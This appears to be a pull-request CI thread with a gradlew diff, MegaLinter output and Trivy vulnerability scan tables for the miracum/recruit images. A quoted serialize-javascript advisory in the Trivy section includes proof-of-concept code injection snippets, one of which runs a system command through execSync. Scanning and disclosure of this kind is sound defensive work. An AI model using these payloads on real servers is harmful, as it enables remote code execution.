+  "-Dorg.gradle.appname=$APP_BASE_NAME" \
+  -jar "$APP_HOME/gradle/wrapper/gradle-wrapper.jar" \
+  "$@"
 
 # Stop when "xargs" is not available.
-if ! command -v xargs >/dev/null 2>&1
-then
-    die "xargs is not available"
+if ! command -v xargs >/dev/null 2>&1; then
+  die "xargs is not available"
 fi
 
 # Use "xargs" to parse quoted args.
@@ -239,10 +238,10 @@
 #
 
 eval "set -- $(
-        printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" |
-        xargs -n1 |
-        sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' |
-        tr '\n' ' '
-    )" '"$@"'
+  printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" |
+    xargs -n1 |
+    sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' |
+    tr '\n' ' '
+)" '"$@"'
 
 exec "$JAVACMD" "$@"

(Truncated to last 5714 characters out of 8251)

⚠️ REPOSITORY / trivy - 25 errors

});
        fakeRegex.toJSON = function() { return '@placeholder'; };
        const output = serialize({ re: fakeRegex });
        // Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
        let obj;
        eval('obj = ' + output);
        console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
        #h2. PoC 2: Code Injection via Date.toISOString()
        ```
        
        ```javascript
        const serialize = require('serialize-javascript');
        const fakeDate = Object.create(Date.prototype);
        fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
        fakeDate.toJSON = function() { return '2024-01-01'; };
        const output = serialize({ d: fakeDate });
        // Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
        eval('obj = ' + output);
        console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
        #h2. PoC 3: Remote Code Execution
        ```
        
        ```javascript
        const serialize = require('serialize-javascript');
        const rceRegex = Object.create(RegExp.prototype);
        Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
        Object.defineProperty(rceRegex, 'flags', {
          get: () => '"+require("child_process").execSync("id").toString()+"'
        });
        rceRegex.toJSON = function() { return '@rce'; };
        const output = serialize({ re: rceRegex });
        // Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
        // When eval'd on a Node.js server, executes the "id" system command
        ```
        
        ### Patches
        
        The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

error: Package: svgo
Installed Version: 2.8.0
Vulnerability CVE-2026-29074
Severity: HIGH
Fixed Version: 2.8.1, 3.3.3, 4.0.1
Link: [CVE-2026-29074](https://avd.aquasec.com/nvd/cve-2026-29074)
      ┌─ src/list/package-lock.json:20720:1
      │  
20720 │ ╭     "node_modules/svgo": {
20721 │ │       "version": "2.8.0",
20722 │ │       "devOptional": true,
20723 │ │       "license": "MIT",
      · │
20738 │ │       }
20739 │ │     },
      │ ╰^
      │  
      = svgo: SVGO: Denial of Service via XML entity expansion
      = SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.

error: Package: ws
Installed Version: 7.5.9
Vulnerability CVE-2024-37890
Severity: HIGH
Fixed Version: 5.2.4, 6.2.3, 7.5.10, 8.17.1
Link: [CVE-2024-37890](https://avd.aquasec.com/nvd/cve-2024-37890)
      ┌─ src/list/package-lock.json:16483:1
      │  
16483 │ ╭     "node_modules/jsdom/node_modules/ws": {
16484 │ │       "version": "7.5.9",
16485 │ │       "dev": true,
16486 │ │       "license": "MIT",
      · │
16501 │ │       }
16502 │ │     },
      │ ╰^
      │  
      ┌─ src/list/package-lock.json:21976:1
      │  
21976 │ ╭     "node_modules/webpack-bundle-analyzer/node_modules/ws": {
21977 │ │       "version": "7.5.9",
21978 │ │       "devOptional": true,
21979 │ │       "license": "MIT",
      · │
21994 │ │       }
21995 │ │     },
      │ ╰^
      │  
      = nodejs-ws: denial of service when handling a request with many HTTP headers
      = ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

error: Package: ws
Installed Version: 8.13.0
Vulnerability CVE-2024-37890
Severity: HIGH
Fixed Version: 5.2.4, 6.2.3, 7.5.10, 8.17.1
Link: [CVE-2024-37890](https://avd.aquasec.com/nvd/cve-2024-37890)
      ┌─ src/list/package-lock.json:22229:1
      │  
22229 │ ╭     "node_modules/webpack-dev-server/node_modules/ws": {
22230 │ │       "version": "8.13.0",
22231 │ │       "devOptional": true,
22232 │ │       "license": "MIT",
      · │
22247 │ │       }
22248 │ │     },
      │ ╰^
      │  
      = nodejs-ws: denial of service when handling a request with many HTTP headers
      = ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

error: 24 errors emitted

(Truncated to last 5714 characters out of 33182)

See detailed reports in MegaLinter artifacts

Your project could benefit from a custom flavor, which would allow you to run only the linters you need, and thus improve runtime performances. (Skip this info by defining FLAVOR_SUGGESTIONS: false)

Documentation: Custom Flavors
Command: npx mega-linter-runner@9.4.0 --custom-flavor-setup --custom-flavor-linters PYTHON_BLACK,PYTHON_FLAKE8,PYTHON_ISORT,PYTHON_BANDIT,PYTHON_MYPY,PYTHON_RUFF,ACTION_ACTIONLINT,BASH_EXEC,BASH_SHELLCHECK,BASH_SHFMT,CSHARP_CSHARPIER,CSHARP_ROSLYNATOR,CSS_STYLELINT,DOCKERFILE_HADOLINT,EDITORCONFIG_EDITORCONFIG_CHECKER,ENV_DOTENV_LINTER,GROOVY_NPM_GROOVY_LINT,HTML_DJLINT,HTML_HTMLHINT,JAVA_CHECKSTYLE,JSON_JSONLINT,JSON_V8R,JSON_PRETTIER,MARKDOWN_MARKDOWNLINT,REPOSITORY_CHECKOV,REPOSITORY_GIT_DIFF,REPOSITORY_GITLEAKS,REPOSITORY_KICS,REPOSITORY_SECRETLINT,REPOSITORY_SYFT,REPOSITORY_TRIVY,REPOSITORY_TRIVY_SBOM,REPOSITORY_TRUFFLEHOG,XML_XMLLINT,YAML_PRETTIER

Show us your support by starring ⭐ the repository

github-actions · 2026-05-03T22:15:58Z

Trivy image scan report

`ghcr.io/miracum/recruit/list:pr-491 (debian 13.3)`

10 known vulnerabilities found (CRITICAL: 1 HIGH: 5 MEDIUM: 3 LOW: 1)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`libc6`	CVE-2026-0861	HIGH	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2025-15281	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2026-0915	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libssl3t64`	CVE-2026-31789	CRITICAL	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-28387	HIGH	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-28388	HIGH	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-28389	HIGH	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-28390	HIGH	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-31790	MEDIUM	3.5.4-1~deb13u2	3.5.5-1~deb13u2
`libssl3t64`	CVE-2026-2673	LOW	3.5.4-1~deb13u2	3.5.5-1~deb13u2

No Misconfigurations found

`Node.js`

17 known vulnerabilities found (MEDIUM: 9 LOW: 3 CRITICAL: 1 HIGH: 4)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`@grpc/grpc-js`	CVE-2024-37168	MEDIUM	1.10.2	1.10.9, 1.9.15, 1.8.22
`cookie`	CVE-2024-47764	LOW	0.4.1	0.7.0
`follow-redirects`	GHSA-r4q5-vmmm-2653	MEDIUM	1.15.11	1.16.0
`jose`	CVE-2024-28176	MEDIUM	2.0.6	4.15.5, 2.0.7
`jws`	CVE-2025-65945	HIGH	3.2.2	3.2.3, 4.0.1
`lodash`	CVE-2026-4800	HIGH	4.17.21	4.18.0
`lodash`	CVE-2025-13465	MEDIUM	4.17.21	4.17.23
`lodash`	CVE-2026-2950	MEDIUM	4.17.21	4.18.0
`path-to-regexp`	CVE-2026-4867	HIGH	0.1.12	0.1.13
`picomatch`	CVE-2026-33671	HIGH	2.3.1	4.0.4, 3.0.2, 2.3.2
`picomatch`	CVE-2026-33672	MEDIUM	2.3.1	4.0.4, 3.0.2, 2.3.2
`protobufjs`	CVE-2026-41242	CRITICAL	7.3.0	8.0.1, 7.5.5
`qs`	CVE-2025-15284	MEDIUM	6.13.0	6.14.1
`qs`	CVE-2026-2391	LOW	6.13.0	6.14.2
`qs`	CVE-2025-15284	MEDIUM	6.14.0	6.14.1
`qs`	CVE-2026-2391	LOW	6.14.0	6.14.2
`uuid`	GHSA-w5hq-g745-h8pq	MEDIUM	8.3.2	14.0.0

No Misconfigurations found

github-actions · 2026-05-03T22:16:28Z

Trivy image scan report

`ghcr.io/miracum/recruit/notify:pr-491 (debian 13.3)`

6 known vulnerabilities found (LOW: 0 CRITICAL: 0 HIGH: 3 MEDIUM: 3)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`libc6`	CVE-2026-0861	HIGH	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2025-15281	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2026-0915	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libfreetype6`	CVE-2026-23865	MEDIUM	2.13.3+dfsg-1	2.13.3+dfsg-1+deb13u1
`libpng16-16t64`	CVE-2026-33416	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4
`libpng16-16t64`	CVE-2026-33636	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4

No Misconfigurations found

`Java`

22 known vulnerabilities found (CRITICAL: 7 HIGH: 6 MEDIUM: 7 LOW: 2)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`ca.uhn.hapi.fhir:org.hl7.fhir.r4`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-34359	HIGH	6.6.7	6.9.4
`ch.qos.logback:logback-core`	CVE-2026-1225	LOW	1.5.22	1.5.25
`com.fasterxml.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	2.19.4	2.21.1, 2.18.6
`org.apache.commons:commons-lang3`	CVE-2025-48924	MEDIUM	3.17.0	3.18.0
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-29145	CRITICAL	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-24734	HIGH	10.1.50	11.0.18, 10.1.52, 9.0.115
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34483	HIGH	10.1.50	9.0.116, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34487	HIGH	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-25854	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-32990	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34500	MEDIUM	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.springframework:spring-webmvc`	CVE-2026-22737	MEDIUM	6.2.15	7.0.6, 6.2.17
`org.springframework:spring-webmvc`	CVE-2026-22735	LOW	6.2.15	7.0.6, 6.2.17
`org.thymeleaf:thymeleaf`	CVE-2026-40477	CRITICAL	3.1.3.RELEASE	3.1.4.RELEASE
`org.thymeleaf:thymeleaf`	CVE-2026-40478	CRITICAL	3.1.3.RELEASE	3.1.4.RELEASE
`org.thymeleaf:thymeleaf-spring6`	CVE-2026-40477	CRITICAL	3.1.3.RELEASE	3.1.4.RELEASE
`org.thymeleaf:thymeleaf-spring6`	CVE-2026-40478	CRITICAL	3.1.3.RELEASE	3.1.4.RELEASE
`tools.jackson.core:jackson-core`	CVE-2026-29062	HIGH	3.0.1	3.1.0
`tools.jackson.core:jackson-core`	GHSA-2m67-wjpj-xhg9	HIGH	3.0.1	3.1.1
`tools.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	3.0.1	3.1.0

No Misconfigurations found

github-actions · 2026-05-03T22:17:07Z

Trivy image scan report

`ghcr.io/miracum/recruit/query-fhir-trino:pr-491 (debian 13.3)`

6 known vulnerabilities found (CRITICAL: 0 HIGH: 3 MEDIUM: 3 LOW: 0)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`libc6`	CVE-2026-0861	HIGH	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2025-15281	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2026-0915	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libfreetype6`	CVE-2026-23865	MEDIUM	2.13.3+dfsg-1	2.13.3+dfsg-1+deb13u1
`libpng16-16t64`	CVE-2026-33416	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4
`libpng16-16t64`	CVE-2026-33636	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4

No Misconfigurations found

`Java`

18 known vulnerabilities found (CRITICAL: 3 HIGH: 6 MEDIUM: 7 LOW: 2)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`ca.uhn.hapi.fhir:org.hl7.fhir.r4`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-34359	HIGH	6.6.7	6.9.4
`ch.qos.logback:logback-core`	CVE-2026-1225	LOW	1.5.22	1.5.25
`com.fasterxml.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	2.19.4	2.21.1, 2.18.6
`org.apache.commons:commons-lang3`	CVE-2025-48924	MEDIUM	3.17.0	3.18.0
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-29145	CRITICAL	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-24734	HIGH	10.1.50	11.0.18, 10.1.52, 9.0.115
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34483	HIGH	10.1.50	9.0.116, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34487	HIGH	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-25854	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-32990	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34500	MEDIUM	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.springframework:spring-webmvc`	CVE-2026-22737	MEDIUM	6.2.15	7.0.6, 6.2.17
`org.springframework:spring-webmvc`	CVE-2026-22735	LOW	6.2.15	7.0.6, 6.2.17
`tools.jackson.core:jackson-core`	CVE-2026-29062	HIGH	3.0.1	3.1.0
`tools.jackson.core:jackson-core`	GHSA-2m67-wjpj-xhg9	HIGH	3.0.1	3.1.1
`tools.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	3.0.1	3.1.0

No Misconfigurations found

github-actions · 2026-05-03T22:18:09Z

Trivy image scan report

`ghcr.io/miracum/recruit/query:pr-491 (debian 13.3)`

6 known vulnerabilities found (CRITICAL: 0 HIGH: 3 MEDIUM: 3 LOW: 0)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`libc6`	CVE-2026-0861	HIGH	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2025-15281	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libc6`	CVE-2026-0915	MEDIUM	2.41-12+deb13u1	2.41-12+deb13u2
`libfreetype6`	CVE-2026-23865	MEDIUM	2.13.3+dfsg-1	2.13.3+dfsg-1+deb13u1
`libpng16-16t64`	CVE-2026-33416	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4
`libpng16-16t64`	CVE-2026-33636	HIGH	1.6.48-1+deb13u3	1.6.48-1+deb13u4

No Misconfigurations found

`Java`

27 known vulnerabilities found (CRITICAL: 7 HIGH: 8 MEDIUM: 9 LOW: 3)

Show detailed table of vulnerabilities

Package	ID	Severity	Installed Version	Fixed Version
`ca.uhn.hapi.fhir:org.hl7.fhir.dstu2`	CVE-2026-33180	CRITICAL	6.5.27	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.dstu2016may`	CVE-2026-33180	CRITICAL	6.5.27	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.dstu3`	CVE-2026-33180	CRITICAL	6.5.27	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.r4`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.r5`	CVE-2026-33180	CRITICAL	6.5.27	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-33180	CRITICAL	6.6.7	6.9.0
`ca.uhn.hapi.fhir:org.hl7.fhir.utilities`	CVE-2026-34359	HIGH	6.6.7	6.9.4
`ch.qos.logback:logback-core`	CVE-2026-1225	LOW	1.5.22	1.5.25
`com.fasterxml.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	2.19.4	2.21.1, 2.18.6
`com.nimbusds:nimbus-jose-jwt`	CVE-2025-53864	MEDIUM	9.37.3	10.0.2, 9.37.4
`io.netty:netty-codec-http`	CVE-2026-33870	HIGH	4.1.130.Final	4.1.132.Final, 4.2.10.Final
`io.netty:netty-codec-http2`	CVE-2026-33871	HIGH	4.1.130.Final	4.1.132.Final, 4.2.11.Final
`org.apache.commons:commons-lang3`	CVE-2025-48924	MEDIUM	3.17.0	3.18.0
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-29145	CRITICAL	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-24734	HIGH	10.1.50	11.0.18, 10.1.52, 9.0.115
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34483	HIGH	10.1.50	9.0.116, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34487	HIGH	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-25854	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-32990	MEDIUM	10.1.50	9.0.116, 10.1.53, 11.0.20
`org.apache.tomcat.embed:tomcat-embed-core`	CVE-2026-34500	MEDIUM	10.1.50	9.0.117, 10.1.54, 11.0.21
`org.springframework:spring-webflux`	CVE-2026-22737	MEDIUM	6.2.15	7.0.6, 6.2.17
`org.springframework:spring-webflux`	CVE-2026-22735	LOW	6.2.15	7.0.6, 6.2.17
`org.springframework:spring-webmvc`	CVE-2026-22737	MEDIUM	6.2.15	7.0.6, 6.2.17
`org.springframework:spring-webmvc`	CVE-2026-22735	LOW	6.2.15	7.0.6, 6.2.17
`tools.jackson.core:jackson-core`	CVE-2026-29062	HIGH	3.0.1	3.1.0
`tools.jackson.core:jackson-core`	GHSA-2m67-wjpj-xhg9	HIGH	3.0.1	3.1.1
`tools.jackson.core:jackson-core`	GHSA-72hv-8253-57qq	MEDIUM	3.0.1	3.1.0